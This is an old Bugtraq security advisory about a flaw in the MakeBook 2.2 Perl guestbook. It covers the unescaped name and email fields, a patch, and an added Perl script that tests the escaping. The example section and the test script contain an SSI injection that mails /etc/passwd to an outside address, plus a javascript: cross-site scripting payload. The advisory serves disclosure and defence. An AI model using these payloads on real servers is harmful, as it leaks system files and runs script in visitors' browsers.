SSI & CSS execution in MakeBook 2.2

From: DownBload (downbload@hotmail.com)
Date: 06/12/02


Date: 12 Jun 2002 07:22:06 -0000
From: DownBload <downbload@hotmail.com>
To: bugtraq@securityfocus.com

      [ DownBload Security Research Lab Advisory ]
[-------------------------------------------------------------------------]
Advisory name: SSI & CSS execution in MakeBook 2.2
Advisory number: 5
Application: MakeBook 2.2 (CGI script)
Application author: Kristina Pfaff-Harris
Source: http://www.tesol.net/scriptmail.html
Date: 12.6.2002
Impact: remote user can execute shell commands & cross site scripting
Tested on: Debian 2.1 (2.0.36 kernel), Apache web server - version 1.3.4
Discovered by: DownBload
Mail me @: downbload@hotmail.com

------[ Overview

"...MakeBook v2.2 is a simple program which can be used as a guestbook,
an ongoing writing project where each person adds to an ongoing story,
a comment board, or even a way to let people add comments to many
individual pages. It allows a user to enter their name, email address,
and some text which will then be added to the "bookfile". Originally
intended for use in writing a continuing story or journal, where
different students could add to the story as they went along, it has
evolved into a more flexible system which allows the owner to choose
how the "book" entries should appear, and even what pages they appear
on..."

------[ Problem
        
Our dear Kristina wrote an advanced CGI guestbook, in Perl of course.
It works fine, but the trouble starts when you look for security measures
in the program. To sign the guestbook you enter your name, email address
and some text. The script strips 'some' special characters from $text,
but it does not touch $name (or $email) at all; because every field is
written verbatim into the bookfile that the web server later serves, you
can enter SSI (Server Side Includes) directives or CSS (Cross Site
Scripting) code instead of a name and have the server, or the next
visitor's browser, execute it.
'Buggy' code:
...
$name  = $data{"Name"};       # written to the bookfile as-is
$email = $data{"Email"};      # written to the bookfile as-is
$text  = $data{"Text"};
$text  =~ s/</&lt;/g;         # only $text gets '<' and '>' neutralised
$text  =~ s/>/&gt;/g;
...

------[ Examples

SSI attack
~~~~~~~~~~
Name: <!--#exec cmd="/bin/mail downbload@hotmail.com < /etc/passwd"-->
E-mail: downbload@hotmail.com
Text: I hacked you, my kung-fu is the best... ;)

CSS attack
~~~~~~~~~~
Name: <img src="javascript:alert('HACKED BY DOWNBLOAD');">
E-mail: downbload@hotmail.com
Text: I hacked you, my kung-fu is the best... ;)

I won't give you more examples, use your own imagination :).
BTW: the SSI attack depends on the web server, because some servers come
with SSI support and some without. On Apache the directives in the
bookfile are only parsed if that file is handled by the server-parsed
handler (by its extension or via XBitHack) and the directory has
Options Includes; with Options IncludesNOEXEC the #exec directive is
refused. The CSS example relies on the browser following a javascript:
URL in an img src, which browsers of the time did; whatever tag you use
reaches the visitor's browser untouched, because $name goes into the
bookfile as-is.

------[ Solution

The fix is to escape user input before it is written to the bookfile,
and to do it for every field, not just $text. For now, you can replace
the three assignments with this. Note that escaping only '<' and '>' is
the minimum: it stops tags and SSI directives (both need '<'), but it
leaves '&' and quotes alone, so a field that ends up inside an attribute
or is parsed again elsewhere can still be abused; escaping '&', '"' and
"'" as well (or using CGI::escapeHTML / HTML::Entities) is the safer
choice:

...
$name = $data{"Name"};
$name =~ s/</&lt;/g;
$name =~ s/>/&gt;/g;

$email = $data{"Email"};
$email =~ s/</&lt;/g;
$email =~ s/>/&gt;/g;

$text = $data{"Text"};
$text =~ s/</&lt;/g;
$text =~ s/>/&gt;/g;
...
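As an added example, not part of the original advisory or of MakeBook itself, the stand-alone Perl script below applies the escaping described above to all three fields, handling '&' first so nothing is double-encoded and covering both quote characters, and feeds it the advisory's own SSI payload as constructed input. The sub names escape_html, sanitize_entry and raw_markup_survives, and the %posted hash, are my own.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Escape the five characters that matter in HTML text and attribute
# context. '&' goes first so the entities produced later are not
# re-encoded; '<' alone is enough to break both tags and SSI directives.
sub escape_html {
    my ($s) = @_;
    return '' unless defined $s;
    $s =~ s/&/&amp;/g;
    $s =~ s/</&lt;/g;
    $s =~ s/>/&gt;/g;
    $s =~ s/"/&quot;/g;
    $s =~ s/'/&#39;/g;
    return $s;
}

# Treat every field that reaches the bookfile the same way, not just Text.
sub sanitize_entry {
    my ($data) = @_;                       # hashref of posted fields
    my %clean;
    for my $field (qw(Name Email Text)) {
        $clean{$field} = escape_html($data->{$field});
    }
    return \%clean;
}

# Reviewer-style check: count fields that still contain the start of an
# SSI directive or of any HTML tag after escaping. Expect zero.
sub raw_markup_survives {
    my ($clean) = @_;
    return scalar grep { /<!--#|<[A-Za-z]/ } values %$clean;
}

# Constructed sample input, modelled on the advisory's SSI example.
my %posted = (
    Name  => '<!--#exec cmd="/bin/mail downbload@hotmail.com < /etc/passwd"-->',
    Email => 'downbload@hotmail.com',
    Text  => 'I hacked you, my kung-fu is the best... ;)',
);

my $clean = sanitize_entry(\%posted);
for my $field (qw(Name Email Text)) {
    print "$field: $clean->{$field}\n";
}
print raw_markup_survives($clean)
    ? "FAIL: raw markup reached the bookfile\n"
    : "ok: no raw markup reached the bookfile\n";
```

The escaped Name comes out as `&lt;!--#exec cmd=&quot;/bin/mail ... &lt; /etc/passwd&quot;--&gt;`, which the server-parsed handler no longer recognises as a directive and the browser renders as plain text.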

------[ Greetz

Greetz goes to #hr.hackers <irc.carnet.hr>.
Special greetz goes to Kristina Pfaff-Harris (ladies first), BoyScout,
h4z4rd, fi, Fr1c, harlequin and www.active-security.org.